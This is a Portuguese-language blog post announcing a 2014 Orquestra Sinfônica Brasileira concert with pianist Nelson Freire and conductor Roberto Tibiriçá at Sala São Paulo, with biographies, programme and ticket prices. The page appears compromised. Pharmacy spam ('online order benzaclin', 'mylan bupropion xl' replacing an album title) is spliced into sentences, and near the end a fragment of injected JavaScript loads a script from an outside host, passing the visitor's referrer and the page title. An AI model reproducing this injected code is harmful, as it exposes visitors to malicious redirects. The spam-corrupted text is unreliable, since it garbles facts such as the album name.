LateralMúsica sinfônicaProgramaçãoSão Paulo

OSB e Nelson Freire tocam em São Paulo

online order benzaclin Concerto apresenta obras de Brahms e Chopin, e tem últimos ingressos à venda.

A Orquestra Sinfônica Brasileira encerra o mês de novembro e a série Safira de 2014 com uma apresentação especial na Sala São Paulo. O conjunto sinfônico, sob regência do maestro Roberto Tibiriçá, reencontra no dia 30, às 17h, o talento do maior pianista brasileiro, Nelson Freire. O programa contempla obras de Brahms e Chopin. Os últimos ingressos estão à venda na bilheteria da Sala São Paulo e no Order site Ingresso Rápido Buy Cheap Order .

O concerto começa com o maestro Tibiriçá comandando a orquestra na interpretação da Sinfonia n°2 em ré maior, de Brahms. Em seguida, Freire sobe ao palco e presenteia o público paulistano, acompanhado da OSB, com o Concerto para piano n°2 em fá menor, de Chopin.

Sobre Nelson Freire Purchase

Com 70 anos de vida completados em 2014 e mais de 60 deles dedicados à música de concerto, Nelson Freire estreou aos 11 anos, em 1956, com a Orquestra Sinfônica Brasileira em seu primeiro recital completo, no Theatro Municipal do Rio de Janeiro. Tocou com regentes ilustres, como Sir Colin Davis, Pierre Boulez, Riccardo Chailly, Charles Dutoit, Valery Gergiev, Eugen Jochum, Lorin Maazel, Rafael Kubelik, Kurt Masur, Rudolf Kempe, Vaclav Neumann, Seiji Osawa, Michel Plasson, André Previn e David Ziman. Dentre as orquestras com as quais já colaborou destacam-se as Filarmônicas de Berlim, Munique e Roterdã, as Sinfônicas de Viena e Londres, as Orquestras do Concertgebouw de Amsterdã e do Tonhalle de Zurique, a Bayerische Rundfunk, a Gewandhaus de Leipzig, entre muitas outras.

Sua discografia inclui registros para os selos Sony/CBS, Teldec, DGG, IPAM e London. Sua gravação dos 24 Prelúdios de Chopin (CBS) recebeu o Prêmio Edison. Desde 2001, grava com exclusividade para o selo Decca, pelo qual lançou seis elogiadíssimos álbuns. Freire ostenta prêmios importantes conquistados ao longo da carreira como Diapason D´Or, Grand Prix de l’Académie Charles Cros, Choc du Monde de la Musique, Gramophone Awards e um Grammy Latino, alcançado em 2013, pelo álbum mylan bupropion xl Brasileiro.

Sobre Roberto Tibiriçá

Roberto Tibiriçá começou sua carreira como pianista e camerista. Iniciou seus estudos de regência com o maestro Eleazar de Carvalho e venceu por duas vezes o Concurso para Jovens Regentes da Osesp, passando a ser seu principal regente convidado. Em 1994, assumiu o posto de diretor adjunto da Orquestra Sinfônica Brasileira e, posteriormente, de diretor artístico.

Vencedor de prêmios APCA e Lei Sarney, foi fundador das orquestras Nova Filarmonia, Nova Sinfonieta e Da Capo. Em 1995, foi eleito pela crítica carioca como o Músico do Ano e recebeu do Governo do Estado do Rio de Janeiro o Prêmio Estácio de Sá pelo seu trabalho com a OSB. De 2000 a 2003, foi diretor artístico e regente titular da Orquestra Petrobras Sinfônica, com a qual gravou dois discos ao vivo no Theatro Municipal, dedicados à música brasileira. Recebeu em 2002 o título de Cidadão do Estado do Rio de Janeiro, concedido pela Assembleia Legislativa. Em 2003, foi eleito pela Academia Brasileira de Música para ocupar a cadeira de nº 5. Em 2005, foi nomeado diretor artístico do Instituto Baccarelli, cujo patrono é o Maestro Zubin Mehta.

 

Serviço:

Orquestra Sinfônica Brasileira

Roberto Tibiriçá – regente

Nelson Freire – pianista

Domingo, 30 de novembro, às 17h, na Sala São Paulo (Praça Júlio Prestes, nº 16 | São Paulo-SP – Telefone 11 3367 9500)

 

Programa:

Johannes Brahms – Sinfonia n°2 em Ré maior, op. 73

Chopin – Concerto para Piano  2 em Fá menor, op. 21

 

Bilheteria: de segunda a sexta, das 10h às 18h, ou até o início do espetáculo; sábados, quando houver apresentação, das 10h às 16h30 ou até o início do concerto; domingos e feriados: a partir de duas horas antes do concerto.

Pelo Ingresso Rápido: 4003-1212, de segunda a sábado das 9h às 22h; domingos, de 12h às 20h.

 

Preços: Camarote Superior – R$ 39 / Balcão Superior – R$ 44 / Plateia Elevada – R$ 80 / Plateia Central – R$ 95 / Balcão Mezanino – R$ 121.

 

Descontos: 10% para associados do Plano I do Programa Nossa Orquestra Brasileira* e funcionários públicos estaduais (com direito a um acompanhante). 20% para associados do Plano II do Programa Nossa Orquestra Brasileira*. 30% para associados do Plano III do Programa Nossa Orquestra Brasileira* e membros do programa Iguatemi One. 50% para associados do Plano IV do Programa Nossa Orquestra Brasileira*, maiores de 60 anos, aposentados, estudantes, professores da rede estadual de ensino pessoas com necessidades especiais, menores de 21 anos, mediante comprovação. (* limitado a 4 ingressos, para compra na bilheteria da Sala São Paulo)

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.